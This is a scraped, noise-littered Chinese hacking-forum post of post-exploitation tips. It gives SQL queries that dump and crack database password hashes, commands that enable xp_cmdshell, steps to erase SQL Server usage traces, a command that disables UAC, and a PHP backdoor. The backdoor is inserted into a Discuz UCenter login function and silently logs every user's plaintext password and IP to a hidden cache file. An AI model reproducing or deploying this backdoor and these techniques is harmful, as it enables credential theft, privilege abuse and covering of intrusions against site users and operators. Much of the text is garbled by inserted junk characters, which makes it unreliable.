;antian365.asp;antian365.jpg" j2 W. F+ d. S' G% _/ q5 ?
- m& X0 k- H! d6 L各种类型数据库抓HASH破解最高权限密码!8 R# ]' V) g; l: [& |2 ]& P
1.sql server2000( n+ P( F* D. A/ a6 q5 E& }, ~" [' i; e
SELECT password from master.dbo.sysxlogins where name='sa'8 g4 b8 S1 U8 P! X k
0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503413 T+ m* f7 K7 k# H
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A7 |% b2 w* Y ?' I5 }1 J* W/ ]
/ V. {- u3 H+ q; \% X+ S0×0100- constant header' W3 U' x, N# F
34767D5C- salt9 L! x, j- h k' f1 k& U
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash9 j9 }1 Z( C7 E# O+ c, r
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
9 @* }$ B) J2 }, Icrack the upper case hash in ‘cain and abel’ and then work the case sentive hash
$ S- G- Y) k* V4 RSQL server 2005:- S4 d& j' d7 f( i. H' R+ r- ?
SELECT password_hash FROM sys.sql_logins where name='sa'/ y' o9 u6 R% I
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F) s' i% ~5 c9 @( g
0×0100- constant header
1 m h- F2 ^8 L7 w3 ?1 c% q993BF231-salt5 `2 |* \# _7 R- `! s9 \- `+ y, V
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
! g: l6 v& w# h s% d8 O1 ocrack case sensitive hash in cain, try brute force and dictionary based attacks.! [8 }# g5 `& o& c0 c
* F) _1 f& }; vupdate:- following bernardo’s comments:-
2 b9 h& e5 Z# O1 z$ fuse function fn_varbintohexstr() to cast password in a hex string.2 z$ u' ?$ C& @3 {8 b
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins5 j1 R2 y _- p8 s9 B2 q/ ^
0 o6 J- T. |4 l4 M1 x, y6 M
MYSQL:-4 t6 z' @1 B0 I0 }1 _ T3 U
/ ^3 G% l X/ Q
In MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.1 U/ v! b1 I- V1 Q
; C( `2 u$ }0 _4 M: Z9 N; d2 T*mysql < 4.1
& l! Q( j+ O- _$ X& ]: p4 o" y/ ~0 s' n( v$ F7 }
mysql> SELECT PASSWORD(‘mypass’);. O' K7 [! o/ N' a2 G$ G B5 L
+——————–+$ X- }/ R+ Z) r
| PASSWORD(‘mypass’) |: I9 u1 z1 d: J Z' C$ ^+ o
+——————–+( ~ q) K% r1 }, M7 H" P1 Q" \0 |: k
| 6f8c114b58f2ce9e |! O" d. o) `1 X( Q* l) \- v) S
+——————–+ v3 @2 t. z( B3 M
0 I5 \8 T6 @+ E
*mysql >=4.1, x0 c$ E; v' D6 ~ e9 T
3 Z3 v: j! |3 V6 [ X
mysql> SELECT PASSWORD(‘mypass’);4 K c1 B$ r6 u0 |% C+ s9 a$ k
+——————————————-+
2 S. v6 c) l6 ^( y1 @| PASSWORD(‘mypass’) | p/ `4 K. J' n4 t$ U4 w
+——————————————-+
# U3 J- t1 P9 o S4 Q5 ?| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |+ g% D8 Y% R& M6 b
+——————————————-+
3 X7 B1 H; I1 H. R" @; J8 k
: Y# `. ] U# }% x7 USelect user, password from mysql.user
+ Z( f. m' ^; r! @2 q: FThe hashes can be cracked in ‘cain and abel’+ b& `% J1 ?0 E4 J
% }/ k2 n2 k* c* e
Postgres:-$ U. r; u' S: F' j e1 }9 R
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”); }7 S! U6 }3 f, Y! r
select usename, passwd from pg_shadow;' [. D/ _* i# e
usename | passwd" n6 o) s- |" g6 l3 i# M- L+ i
——————+————————————-1 l/ c4 z, n- g' ^/ E
testuser | md5fabb6d7172aadfda4753bf0507ed4396
& @0 f+ J& E/ |2 B+ R; quse mdcrack to crack these hashes:-5 A; ?! c0 Z$ I: U4 Z ~6 r. d
$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396; ?6 U- K% l, O2 @# B+ s0 L& z
* K' G1 \+ p3 ] V% m0 s* jOracle:-" V) n, [: u% `% j# v. I& ?. N3 L9 B! r
select name, password, spare4 from sys.user$
8 ]6 d1 l; W- |hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g$ c: s4 E" y0 s8 p
More on Oracle later, i am a bit bored….
3 k% ~% ~/ V5 |5 [6 P& L; \/ E& D8 G: b- E3 |1 d9 a
1 M6 H3 A6 ?; P! R, v1 B) s" F在sql server2005/2008中开启xp_cmdshell
}$ I8 t% z( R9 O-- To allow advanced options to be changed.
' B$ R9 R" J3 }EXEC sp_configure 'show advanced options', 1! s8 x4 B5 j; A [! [' `/ p
GO
5 f" y( C7 \5 B- b% a-- To update the currently configured value for advanced options.7 B+ S+ f) I" a5 K, a
RECONFIGURE
0 d3 k' A5 H, t Y7 z# _GO+ S2 C- a- n, z2 Y- I; U9 ^
-- To enable the feature.
1 V8 @" H& z1 ^# lEXEC sp_configure 'xp_cmdshell', 1
0 b2 K6 c! H0 k$ T% r4 a' MGO
J x8 X; F* ?8 F2 n-- To update the currently configured value for this feature.& U# y7 z1 R5 U& s
RECONFIGURE- b! T% I, T. o+ d
GO5 ?+ ~: j, C9 L9 W8 v
SQL 2008 server日志清除,在清楚前一定要备份。) m/ F2 L! i# V4 a
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
9 o: F# R2 G' L) V8 ?2 }( DX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin7 [( W# o0 ^+ H% Y
- R( m1 Y _; W( h* g7 K
对于SQL Server 2008以前的版本:
. D- M( ^& [) Z4 fSQL Server 2005:
7 Z6 ^; a/ }2 P3 N# O( r" A1 J7 r删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat+ \3 Z9 a' C% P
SQL Server 2000:
. N8 U& r8 ]! u清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
# ^$ y/ @& r" B6 X/ I: V
# v/ o+ |' n% s0 q6 Z9 c$ e本帖最后由 simeon 于 2013-1-3 09:51 编辑3 g3 g: G* R. g& X) g, }
0 U# I& |3 `5 H, U% U9 Q
3 e' F5 [! q( A+ [. ^9 B
windows 2008 文件权限修改
$ t, u+ |0 E( {8 M! [1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
- h; N. m+ L: [0 O' J* p: k2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98; `2 |1 ^. T5 R! A$ I, C# t9 [
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,
/ v f) C' O; N7 r7 X
- R% D7 b% R& Z8 K8 j3 a) I0 k; bWindows Registry Editor Version 5.00& m' d( h4 H7 N( O1 y6 |4 F
[HKEY_CLASSES_ROOT\*\shell\runas]
6 Z8 p' X$ r# `0 O% Y- p* Z@="管理员取得所有权"
1 f" O) H* P; [$ Z+ D% ]3 `5 ?"NoWorkingDirectory"=""- ~& I2 W# j' E: Q- u4 l
[HKEY_CLASSES_ROOT\*\shell\runas\command]2 l f/ h) e6 Q! @
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
* y5 V. |0 B- N" ^ S" G"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"! T5 p6 {" u6 p( F2 D; b% _0 }
[HKEY_CLASSES_ROOT\exefile\shell\runas2]# ]# j, I2 R: d; R
@="管理员取得所有权"/ o2 r- j x# g1 ^* j) k
"NoWorkingDirectory"=""
: }, q( y! p S; p7 r[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]7 ]# M7 q" x% e z' K- A8 t
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"5 d7 ]: b. b* ^7 A) |" R+ f5 s
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
# N9 F& E, R! D I! R9 L
0 m! M; I _, x$ }6 h[HKEY_CLASSES_ROOT\Directory\shell\runas]. S7 R1 D6 ]! F" M/ Z4 z
@="管理员取得所有权"+ u; B; W% H# \" J8 `+ _! W
"NoWorkingDirectory"=""* k$ D9 Y2 u3 d6 l" h! z
[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
0 \& P5 R& {+ c, C' F: i( z@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"
- R3 {7 N( ?% x M4 a, ]"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"9 T+ g6 @1 j* a$ R$ k
; A/ k7 g& ^9 v, d. v3 d7 b
( e0 j' d, K& l9 y5 A- vwin7右键“管理员取得所有权”.reg导入
* [. M9 k& D- Z' P7 |8 B二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,$ u: ]2 _4 j* |8 w! T, m
1、C:\Windows这个路径的“notepad.exe”不需要替换
; [# s3 E( Q- G, Z# f7 g) m2 H2、C:\Windows\System32这个路径的“notepad.exe”不需要替换% Z% J; {( @. M) r Z
3、四个“notepad.exe.mui”不要管
( w& ?7 m9 @6 q0 I4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和( y) _* r1 C4 n
C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
' m* l7 ]( R, g7 {替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面, S( {& V; K, L% J' a) O- y) e
替换完之后回到桌面,新建一个txt文档打开看看是不是变了。
) B+ a, \7 M) r, F) N( Jwindows 2008中关闭安全策略: 9 a8 `8 W7 W9 l! o5 v8 R8 r
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f% x' |% n+ D5 X8 U0 U& w* p5 k
修改uc_client目录下的client.php 在
6 l6 t m& A. B; zfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {3 N9 ? H/ U* N0 [# s! L3 i
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php. r# x! c% T. g" k
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw
/ r. |# w2 e& Q' C1 Iif(getenv('HTTP_CLIENT_IP')) {) n" N$ l* P! A% r
$onlineip = getenv('HTTP_CLIENT_IP');
- V2 r' Y* k4 Y6 ?3 e% T" w} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
?0 s$ L( ]' m5 Q7 g5 K$onlineip = getenv('HTTP_X_FORWARDED_FOR');/ S. Q8 V) t% Q) w/ o# T5 t
} elseif(getenv('REMOTE_ADDR')) {
2 X6 o$ u% j2 L% P% I$onlineip = getenv('REMOTE_ADDR');
- r- E$ U$ t1 O8 M7 C* R' R. b6 l} else {
C: d- h/ d; [2 R/ C$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR']; R) L% S- z) y+ C( [7 D) a4 P8 S
}
( [+ ?2 Z6 `) z; _* I: w $showtime=date("Y-m-d H:i:s");
8 V8 L: i8 @3 A7 N $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";7 \9 q; m" O5 w' W0 t1 N- M5 ~
$handle=fopen('./data/cache/csslog.php','a+');4 }! _2 z) t8 ?4 u. v* I9 e
$write=fwrite($handle,$record); |
发表于 2013-2-27 21:24:42
收藏
支持
反对